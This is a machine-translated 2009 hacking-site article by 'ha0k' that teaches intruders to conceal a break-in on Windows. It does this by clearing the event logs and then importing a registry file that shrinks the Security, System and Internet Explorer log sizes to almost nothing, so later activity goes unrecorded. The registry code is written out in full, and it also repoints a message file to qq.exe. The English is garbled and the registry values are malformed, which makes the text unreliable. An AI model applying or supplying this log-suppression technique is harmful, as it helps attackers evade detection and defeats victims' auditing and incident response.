To modify log file properties protect yourself will not be the administrator found that(idea)-bug warning-the black bar safety net

2009-10-15T00:00:00
ID MYHACK58:62200925022
Type myhack58
Reporter 佚名
Modified 2009-10-15T00:00:00

Description

by ha0k

The log file location is actually stored in the registry, as long as we modify its attributes to mask their intrusion traces, here just modify the default location, the log size of the property, such as log size 0 0 0 0 0 0 0 1,so that it can not be normal recording, so it can be perfect to ensure the invasion is not recorded, than to clear the logs more secure. Of course first of all with the Clear log tool, remove the previous traces, the better.

The following is the demo code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Internet Explorer] "MaxSize"=dword:0 0 0 0 0 0 0 1 "File"="%SystemRoot%\System32\Config\Internet Explorer. evt" "Retention"=dword:0 0 0 0 0 0 0 0 The "Sources"="hacked by ha0k" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\Security] "file"="%SystemRoot%\System32\config\SecEvent. Evt" "MaxSize"=dword:0 0 0 0 0 0 0 1 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog\System] "EventMessageFile"="%systemroot%\system32\qq.exe" "File"="%SystemRoot%\system32\config\SysEvent. Evt" "MaxSize"=dword:0 0 0 0 0 0 0 1